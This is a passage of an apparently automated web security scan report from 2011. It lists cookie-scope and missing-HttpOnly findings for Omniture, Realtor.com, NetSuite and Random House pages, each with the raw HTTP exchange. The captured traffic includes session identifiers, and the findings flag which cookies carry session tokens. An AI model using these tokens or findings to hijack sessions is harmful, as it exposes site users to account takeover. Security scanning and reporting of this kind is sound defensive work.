The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/multichannel_analytics/insight_retail HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; s_iid=30199; s_osc=30199; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271432|check#true#1303852292|session#1303852218540-851916#1303854092

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:16:40 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:16:40 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:16:40 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:16:40 GMT; path=/; domain=omniture.com
Content-Length: 32191


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Insight for Retail | Channel An
...[SNIP]...

13.102. http://www.omniture.com/en/products/online_analytics/digitalpulse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/online_analytics/digitalpulse

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/online_analytics/digitalpulse HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=1327; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DTest%252526Target%2526pidt%253D1%2526oid%253Dhttp%25253A//www.omniture.com/offer/943%25253Fs_osc%25253D30199%2526ot%253DA; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271428|check#true#1303852288|session#1303852218540-851916#1303854088

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:16:31 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:16:31 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:16:31 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:16:31 GMT; path=/; domain=omniture.com
Content-Length: 30867


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Online Analytics | Web Analytic
...[SNIP]...

13.103. http://www.omniture.com/en/products/online_analytics/discover  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/online_analytics/discover

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/online_analytics/discover HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=1327; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DTest%252526Target%2526pidt%253D1%2526oid%253Dhttp%25253A//www.omniture.com/offer/943%25253Fs_osc%25253D30199%2526ot%253DA; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271426|check#true#1303852286|session#1303852218540-851916#1303854086

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:16:29 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:16:29 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:16:29 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:16:29 GMT; path=/; domain=omniture.com
Content-Length: 30980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture | Online Analytics | D
...[SNIP]...

13.104. http://www.omniture.com/en/products/online_analytics/sitecatalyst  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/online_analytics/sitecatalyst

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/online_analytics/sitecatalyst HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=1327; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DTest%252526Target%2526pidt%253D1%2526oid%253Dhttp%25253A//www.omniture.com/offer/943%25253Fs_osc%25253D30199%2526ot%253DA; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271419|check#true#1303852279|session#1303852218540-851916#1303854079

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:16:23 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:16:23 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:16:23 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:16:23 GMT; path=/; domain=omniture.com
Content-Length: 39922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Online Analytics | Web Analytic
...[SNIP]...

13.105. http://www.omniture.com/en/products/online_analytics/survey  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/online_analytics/survey

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/online_analytics/survey HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=1327; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DTest%252526Target%2526pidt%253D1%2526oid%253Dhttp%25253A//www.omniture.com/offer/943%25253Fs_osc%25253D30199%2526ot%253DA; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271424|check#true#1303852284|session#1303852218540-851916#1303854084

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:16:28 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:16:28 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:16:28 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:16:28 GMT; path=/; domain=omniture.com
Content-Length: 29081


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Online Survey, Voice of Custome
...[SNIP]...

13.106. http://www.omniture.com/en/products/open_business_analytics_platform/datawarehouse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/open_business_analytics_platform/datawarehouse

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/open_business_analytics_platform/datawarehouse HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_iid=30199; s_osc=30199; s_cc=true; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271438|check#true#1303852298|session#1303852218540-851916#1303854098

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:18:22 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:18:22 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:18:22 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:18:22 GMT; path=/; domain=omniture.com
Content-Length: 22266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture | Open Business Analyt
...[SNIP]...

13.107. http://www.omniture.com/offer/943  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /offer/943

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/943?s_osc=30199 HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=1327; omniture_unique=112017266a99890bba572ea82148c69e; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; mbox=PC#1303601743323-887111.17#1306269330|check#true#1303850212|session#1303850129880-628856#1303851990|signal-click#productpage_feature-clicked%26mboxTarget%3D34394.4497#1303854916; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DTest%252526Target%2526pidt%253D1%2526oid%253Dhttp%25253A//www.omniture.com/offer/943%25253Fs_osc%25253D30199%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:15:48 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Tue, 26 Apr 2011 21:15:48 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:15:48 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:15:48 GMT; path=/; domain=omniture.com
Content-Length: 14317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Which Promotions Do Your Custom
...[SNIP]...

13.108. http://www.realtor.com/search/widgetportal/Widget.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realtor.com
Path:   /search/widgetportal/Widget.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/widgetportal/Widget.aspx?wname=MainSearchXSLContainer&app=8bcac8850c63428982ba6b6b90c09cfa&zip=75207 HTTP/1.1
Host: www.realtor.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:46:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=02cqtyvthyh3kbzxkedpaqwg; path=/; HttpOnly
Set-Cookie: SAVEDITEMS=; domain=realtor.com; expires=Mon, 25-Apr-2011 18:46:19 GMT; path=/
Set-Cookie: criteria=sby=3&loc=75207&usrloc=75207&typ=3&status=1; domain=realtor.com; path=/
Set-Cookie: recAlertSearch=recAlertShown=false&sameSrch=false&saveLstCnt=0&sid=; domain=realtor.com; path=/
Set-Cookie: RecentSearch=loc%3dNew+York%2c+NY%26typ%3d3%26mnp%3d%26mxp%3d%26bd%3d0%26bth%3d0%26status%3d1; domain=realtor.com; expires=Thu, 26-Apr-2012 18:46:19 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 69807
Content-Length: 69807


<!DOCTYPE html>
<!--[if gte IE 8]><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="IE IE8 IE6+ IE7+ IE8+ IE8-"><![endif]-->
<!--[if IE 7]><html xmlns="http://www.w3.org/19
...[SNIP]...

14. Cookie without HttpOnly flag set  previous  next
There are 183 instances of this issue:


14.1. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s.nl?c=1142057&n=1&sc=4&ck=rcHW8655AeSHwA-v&vid=rcHW8655Ac-HwJur&cktime=96686&cart=776158&gc=clear&ext=F&whence= HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: http://www.magellangps.com/s.nl?sc=3&whence=&custcol_celigo_serialno=
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); mbox=PC#1303736347554-914602.17#1304955927|check#true#1303746387|session#1303743154006-383984#1303748187

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 26 Apr 2011 21:41:16 GMT
Server: Apache
Location: /s.nl?c=1142057&sc=4&whence=&n=1&ext=F
NS_RTIMER_COMPOSITE: 1113376901:616363742D6A6176613030392E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=LjrDN37cBJJvxH0XfZgYzyDYkyR4yJ2jH3C0msdJq2nh0MrNV1BW8yR6R81HZfQx7Ltv7XzmGqzGY1y32tjZms1VGrt0sSKl9QW2jP1YHBHNxchCbG0H2Q0n7T2vjQNL!39951840; path=/
Set-Cookie: NLVisitorId=rcHW8655Ac-HwJur; domain=checkout.netsuite.com; expires=Monday, 16-Apr-2012 21:41:16 GMT; path=/
Set-Cookie: NLShopperId=rcHW8655AeSHwA-v; domain=checkout.netsuite.com; expires=Tuesday, 03-May-2011 21:41:16 GMT; path=/
Set-Cookie: gc=1142057_clear; domain=checkout.netsuite.com; path=/
Set-Cookie: NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
NLRedirectReason: redirect after consuming actionable parameters
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Length: 0
Keep-Alive: timeout=10, max=818
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


14.2. http://data.cmcore.com/imp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://data.cmcore.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?tid=17&ci=90223951&vn1=4.1.1&vn2=e4.0&ec=ISO-8859-1&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1&rand=110252757556736 HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 18:40:40 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: CoreID6=70231303843240013779332; path=/; expires=Sat, 25 Apr 2026 18:40:40 GMT
Set-Cookie: TestSess3=70231303843240013779332;path=/
Location: /imp?tid=17&ci=90223951&vn1=4.1.1&vn2=e4.0&ec=ISO-8859-1&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1&rand=110252757556736&cvdone=p
Content-Type: text/plain; charset=UTF-8
Content-Length: 0


14.3. http://ecommerce.randomhouse.com/cart.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ecommerce.randomhouse.com
Path:   /cart.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart.do?from=randomhouse HTTP/1.1
Host: ecommerce.randomhouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:22 GMT
Server: Apache
Set-Cookie: JSESSIONID=99AF3E637ECB1D69552DA7E98D58C60F.ecommerce_wrk1; Path=/
Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 19400


<!-- shoppingCart.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

14.4. https://ecommerce.randomhouse.com/account.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://ecommerce.randomhouse.com
Path:   /account.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account.do?from=randomhouse HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:29 GMT
Server: Apache
Set-Cookie: JSESSIONID=30BCBB9743BBB87336047B037BF512BF.ecommerce_wrk1; Path=/; Secure
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 16859


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...

